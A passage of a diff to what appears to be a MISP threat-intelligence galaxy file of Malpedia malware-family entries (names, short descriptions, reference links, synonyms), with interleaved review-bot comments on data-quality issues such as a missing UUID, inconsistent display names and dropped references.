"https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" 
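Review bot: The new `win.unidentified_059` entry near the top of this hunk ships with `"uuid": ""`, while every sibling entry carries a UUID; MISP addresses galaxy cluster values by that field, so an empty string cannot be tagged onto events and would collide with any other entry that is exported the same way. The entry should not land until it carries a stable identifier, e.g. `"uuid": "<UUID-FROM-MALPEDIA-EXPORT>",` — and if the upstream export does not supply one, it presumably has to be assigned once and kept fixed across re-imports, since changing it later orphans existing tags. The same entry uses the raw Malpedia id as its display name (`"value": "win.unidentified_059"`) where its neighbours use the `"Unidentified 060"` form, which looks like the export's fallback when no name is set; worth confirming before merge. Separately, the Unidentified 066 description reads `c2 sever`, a typo for `c2 server` in user-facing text that originates upstream.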
@@ -17581,14 +31820,15 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone",
 "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
 "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
- "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
+ "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/",
+ "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
 "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
- "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/",
+ "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA",
 "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
 "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
- "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
+ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
 "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/",
- "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/"
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf"
 ],
 "synonyms": [
 "Bebloh",
@@ -17606,11 +31846,12 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/",
 "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
 "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation",
 "https://www.circl.lu/pub/tr-25/",
 "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453",
 "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
 "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots",
 "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg",
 "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/"
@@ -17623,6 +31864,101 @@ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (Windows)" }, + { + "description": "According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view" + ], + "synonyms": [], + "type": [] + }, + "uuid": "56af8251-4236-42e0-99bc-2c32377e97bb", + "value": "USBCulprit" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", + "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d0a92c0-cad8-4470-b780-3041774acad3", + "value": "USBferry" + }, + { + "description": "ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist", + "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d4ab5619-2347-4949-8102-78296b87a08c", + "value": "Vadokrist" + }, + { + "description": "", + "meta": { + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vaggen", + "https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "006621d1-a3bd-40f2-a55c-d79c84879a6b", + "value": "Vaggen" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", + "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dd95eefd-2ef3-4bda-9065-18f4b03c2249", + "value": "VALUEVAULT" + }, + { + "description": "Description:\r\n\r\nVanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library.\r\nFeatures:\r\n\r\n Remote Desktop Viewer (With remote click)\r\n File Browser (Including downloading, drag and drop uploading, and file opening)\r\n Process Manager\r\n Computer Information\r\n Hardware Usage Information (CPU usage, disk usage, available ram)\r\n Message Box Sender\r\n Text To Speech\r\n Screen Locker\r\n Live Keylogger (Also shows current window)\r\n Website Opener\r\n Application Permission Raiser (Normal -> Admin)\r\n Clipboard Text (Copied text)\r\n Chat (Does not allow for client to close form)\r\n Audio Recorder (Microphone)\r\n Process Killer (Task manager, etc.)\r\n Remote Shell\r\n Startup\r\n Security Blacklist (Drag client into list if you don't want connection. Press del. 
key on client to remove from list)\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat", + "https://github.com/DannyTheSloth/VanillaRAT" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5bb80b4a-d304-460a-bb07-417dea64f213", + "value": "vanillarat" + }, + { + "description": "In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky", + "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", + "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f0740430-248f-4dd9-a2f3-b2592090a8a6", + "value": "Varenyky" + }, { "description": "", "meta": { @@ -17651,9 +31987,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", "https://twitter.com/malwrhunterteam/status/1095024267459284992", - "https://twitter.com/malwrhunterteam/status/1093136163836174339" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/", + "https://twitter.com/malwrhunterteam/status/1093136163836174339", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [ + "Buran", "Vega" ], "type": [] 
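Review bot: The new vanillarat entry has `"value": "vanillarat"` in lower case while its own description and the linked GitHub project call it VanillaRat, and the neighbouring entries in this hunk (USBCulprit, Vadokrist, VALUEVAULT, Varenyky) all use the family's display name; `value` is the name the cluster is shown and tagged under, so the casing should be fixed in the upstream export before the entry is first used. The same entry's description is a verbatim README paste that starts with `Description:\r\n\r\n` and keeps CRLF breaks and leading spaces in the feature list, which will render as one run-on block in MISP; a single-paragraph summary in the style of the USBCulprit and Vadokrist descriptions would be consistent with the rest of the file. Both points are upstream data issues, so a hand edit here would be reverted by the next regeneration.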
@@ -17674,6 +32013,35 @@ "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", "value": "Velso Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/", + "https://blog.malwarelab.pl/posts/venom/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ce1f55e-ac43-4fcb-b647-ff5ae9c26b7c", + "value": "Venom RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dea1ff4f-bc6d-40c0-9d19-b60578ea1344", + "value": "VenomLNK" + }, { "description": "", "meta": { 
@@ -17715,13 +32083,31 @@ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://twitter.com/GrujaRS/status/1241657443282825217" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb0ad46d-20b6-4e8c-b401-702197667272", + "value": "VHD Ransomware" + }, { "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [], 
@@ -17762,14 +32148,26 @@ "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", "value": "Virut" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vizom", + "https://securityintelligence.com/posts/vizom-malware-targets-brazilian-bank-customers-remote-overlay/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a49d6db9-32a0-42a8-acb9-174146a7fafa", + "value": "Vizom" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", - "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" + "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/" ], "synonyms": [ "VMzeus", 
@@ -17787,21 +32185,47 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions" + ], + "synonyms": [ + "Beebone" ], - "synonyms": [], "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", "value": "Vobfus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.void", + "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html" + ], + "synonyms": [ + "VoidCrypt Ransomware" + ], + "type": [] + }, + "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641", + "value": "Void Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", "https://www.us-cert.gov/ncas/alerts/TA17-318B", - "https://securelist.com/operation-applejeus/87553/" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74", + "https://securelist.com/operation-applejeus/87553/", + "https://securelist.com/lazarus-threatneedle/100803/", + "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view", + "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view" ], "synonyms": [ "FALLCHILL", 
@@ -17812,6 +32236,20 @@
 "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
 "value": "Volgmer"
 },
+ {
+ "description": "Ransomware written in D.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex",
+ "https://twitter.com/VK_Intel/status/1355196321964109824",
+ "https://twitter.com/malwrhunterteam/status/1351808079164276736"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fe4ffa8d-74d2-472a-b0ca-83f9e7f95739",
+ "value": "Vovalex"
+ },
 {
 "description": "",
 "meta": {
@@ -17853,6 +32291,19 @@
 "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8",
 "value": "w32times"
 },
+ {
+ "description": "Wabot is an IRC worm that is written in Delphi. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot",
+ "https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cce35d3d-aea0-4e59-92cf-3289be4a4c21",
+ "value": "win.wabot"
+ },
 {
 "description": "",
 "meta": {
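Review bot: The Wabot entry in the second hunk uses the Malpedia identifier as its name, `"value": "win.wabot"`, whereas every other entry visible in this diff uses the family's display name (the Vovalex entry in the first hunk has `"value": "Vovalex"`); the value is what the cluster is displayed and tagged as, so it should read `"value": "Wabot"`. Its description also carries a trailing space, `"Wabot is an IRC worm that is written in Delphi. "`. Both come straight from the API export, so the correction belongs in Malpedia or in the import script rather than in this file, otherwise the next regeneration reintroduces it.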
@@ -17871,22 +32322,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", + "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", + "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html", + "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", + "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", + 
"https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", + "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", + "https://www.youtube.com/watch?v=Q90uZS3taG0", + "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/" ], "synonyms": [ "Wana Decrypt0r", 
@@ -17898,6 +32361,49 @@ "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", "value": "WannaCryptor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren", + "https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44f548e2-9a47-433a-bccf-fff412d2963b", + "value": "WannaRen Ransomware" + }, + { + "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", + "https://securelist.com/wastedlocker-technical-analysis/97944/", + "https://ioc.hatenablog.com/entry/2020/08/16/132853", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", + "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + 
"https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", + "https://www.bbc.com/news/world-us-canada-53195749", + "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", + "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e72a0bde-ea5b-4450-bc90-b5d2dca697b4", + "value": "WastedLocker" + }, { "description": "", "meta": { 
@@ -18099,20 +32605,36 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord", + "https://revcode.se/product/webmonitor/", + "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], - "synonyms": [], + "synonyms": [ + "RevCode" + ], "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, { - "description": "", + "description": "WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example \"gost\". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + 
"https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] @@ -18120,12 +32642,25 @@ "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, + { + "description": "According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain \"working_hours\" with a granularity of one minute.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "20286294-3813-4c17-a165-ef12aae64303", + "value": "WhiteBird" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", - "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire" ], "synonyms": [], "type": [] @@ -18133,6 +32668,19 @@ "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", "value": "WildFire" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winlog", + "https://github.com/Thibault-69/Keylogger-Windows-----WinLog" + ], + "synonyms": [], + "type": [] + }, + "uuid": "772099d0-b74a-4a73-9967-f1d40ab3ac92", + "value": "winlog" + }, { "description": "", "meta": { 
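Review bot: The new WellMess description begins `WellMess is A Remote Access Trojan written in GoLang and .NET`, with a stray capital A mid-sentence; the text is otherwise fine, so this is a one-character fix in the upstream description. In the WebMonitor refs just above, the added `https://revcode.se/product/webmonitor/` is the vendor's own product page rather than an analysis; it is a legitimate primary source for the RevCode synonym added in the same hunk, but it is worth confirming the link is wanted in the cluster rather than inherited from the export unreviewed. The WebMonitor/WellMess hunk starts on the preceding line of this diff.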
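Review bot: The WildFire entry loses its only external reference (the labs.opendns.com write-up) and is left with just the self-referential Malpedia URL, so a user following the cluster no longer has a source for the family; the Wonknu hunk further down does the same with its labsblog.f-secure.com link. If those pages are gone, keeping an archived copy of the URL would preserve the source; if the removal is deliberate upstream, a sentence in the commit description saying so would stop reviewers from flagging it again on the next export.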
@@ -18153,16 +32701,47 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", + "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", + "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", + "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", + "https://securelist.com/games-are-over/70991/", + "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", "https://github.com/TKCERT/winnti-suricata-lua", - "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", - "https://github.com/TKCERT/winnti-nmap-script", + "http://web.br.de/interaktiv/winnti/english/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", + 
